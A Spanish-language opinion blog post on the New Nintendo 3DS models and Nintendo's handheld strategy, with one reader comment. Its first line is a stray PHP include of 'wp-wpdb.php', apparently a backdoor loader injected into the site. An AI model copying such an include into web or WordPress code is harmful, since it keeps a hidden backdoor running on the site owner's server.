if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Nuevos modelos de Nintendo 3DS ¿Que significan para Nintendo? – La Fortaleza de LeChuck

Nuevos modelos de Nintendo 3DS ¿Que significan para Nintendo?

New Nintendo 3DS XL

Nintendo 3DS es sin ninguna duda la consola de Nintendo que de mayor salud goza y, con Wii U obteniendo mediocres cifras semana tras semana, parecía que el apoyo en Nintendo 3DS iba a ser vital. Nadie podía adivinar que nuevos modelos se presentarían en el Nintendo Direct Japonés, aún estando acostumbrados a que Nintendo anuncie a bombo y platillo sus nuevas consolas.

Segundo stick, más potencia y efecto 3D mejorado

Desde la presentación del primer modelo, que ya portaba ese gran error de diseño para juegos en tres dimensiones, ha sido eterno el rumor de una Nintendo 3DS con un segundo stick , y tras la confirmación de su existencia, ni siquiera los que pedían ese segundo stick estarán contentos. Como podéis ver este segundo stick, es muy pequeño, es incluso más pequeño que la botonera, y para mi gusto, se situa en una posición muy incómoda. La idea es, igual que pasaba en Gamecube y en Nintendo 64 anteriormente con los botones C, la de mover una cámara tridimensional con algo de comodidad, pero sin duda no está hecha para, por ejemplo, jugar FPS, con ese diminuto tamaño y poco recorrido. También trae otras características que si han mejorado, como la pantalla 3D que ahora tiene un ángulo de visión mucho mayor para poder mover la cabeza sin miedo de quedarse uno bizco, dos nuevos botones traseros, al costado de los actuales L-R hacia el centro, y aprovechan además para incluirle chip NFC, dándoles absoluta compatibilidad con sus figuras Amiibo. Carcasas intercambiables y modelos exclusivos son otras de las características, ya más de estética, que han enseñado en el Nintendo Direct.

Todo eso son pequeñas novedades que no empañan demasiado al usuario actual, pareciendo que las New Nintendo 3DS son una revisión más de la consola, pero no es así, pues también se confirma la peor noticia para los actuales poseedores de Nintendo 3DS, que estas New Nintendo 3DS traen más potencia. No solo son más rápidas en los menús, descargas y otras pequeñas características, también la utilizará en juegos, anunciando en exclusiva para esta consola un port de Xenoblade de Wii que no será compatible con las actuales Nintendo 3DS (Que por otro lado se veía horrible, casi como si la propia Nintendo 3DS hubiese sido capaz de moverlo, como ya hizo con Monster Hunter 3). Una manera muy rara de acortar la vida de los modelos actuales, pues en general, casi todas estas cosas las podía haber traído la Nintendo 3DS original de serie sin mucho problema ni sobrecoste.

¿Buscan un impulso en las ventas de portátiles o solamente alargan esta generación?

Los más astutos apuntan a la segunda opción. Si quisieran eclipsar totalmente a Nintendo 3DS sacarían una consola realmente más potente y con nuevas características, y no solamente mejorarla un poco utilizando misma interfaz, juegos, etc. Parece, más bien, que solo quieren hacer un repunte sobre el mismo modelo. Es decir, New Nintendo 3DS es un modelo nuevo, con más potencia y algún juego exclusivo, está claro que es así, pero todo hace pensar que solo es un pequeño peldaño para lo que está por llegar, solamente un modelo que impulsa y a la vez mata la vida de Nintendo 3DS, como hizo Nintendo DSi con Nintendo DS, como versión definitiva de la idea 3DS antes de su sucesora. ¿No es algo pronto? Sí, pero si lo piensas, parece que sacarán solamente algún port de Wii, pues Xenoblade no es un superventas como para lanzar un producto rompedor. Además en Nintendo 3DS ya han sacado juego de cada una de sus sagas, y sabiendo como es Nintendo, no creo que nos saquen otro Zelda, otro Mario Kart, u otro Mario plataformero si no es con una consola con más potencia y posibilidades, y esa no es New Nintendo 3DS.

Allanando el futuro

Como ya han dicho varias veces las cabezas pensantes de Nintendo, como Shigeru Miyamoto, el futuro es portátil… pero también sobremesa, es decir, aumentar la potencia de una portátil y su conectividad para que si llegamos a casa podamos conectarla al televisor y jugar con ella de forma cómoda pero también poder seguir tu partida en cualquier sitio desde su propia pantalla. Parece que quieran alargar la vida de Nintendo 3DS, que salió más pronto que Wii U,  para hacer coincidir sus finales de vida y combinar las ideas en una sola consola. Tiene toda la lógica del mundo, sobretodo porque a Wii U no le ha ido, ni le está yendo, no le irá (no nos engañemos) bien en ventas. Por suerte muchos podemos conformarnos en que en una plataforma u otra, seguiremos teniendo las sagas exclusivas de Nintendo que dan color a sus máquinas.

Publicada el
Categorizado como Opinión

Por Museboy

Como la mayoría de vosotros, crecí jugando a videojuegos y ahora intento transmitir toda la pasión por este mundo en La Fortaleza de LeChuck. También busco ofertas de videojuegos. Seguidme en Twitter y sabréis de qué hablo.

1 comentario

  1. Creo que es acertado por parte de Nintendo, no había que incluir un
    segundo stick en la XL por que era una simple versión más grande de la
    3DS, y tampoco había que incluirlo en una versión más barata como la 2DS
    por que esa no tiene 3D y si quieren sacar nuevos juegos en 3D con el
    uso obligatorio de segundo stick, esa no podía ser usada para ello, con
    lo cual creo que Nintendo ha acertado. Y espero ver las mejoras del 3D
    por que, como todos sabemos, siempre se escuchaba «ojalá la bajen de
    precio, aun que sea quitando el 3D, que total es una mierda…» y todos
    sabemos que el 3D para hacer la gracia un rato vale, pero para jugar de
    forma habitual no lo aguanta nadie.

Dejar un comentario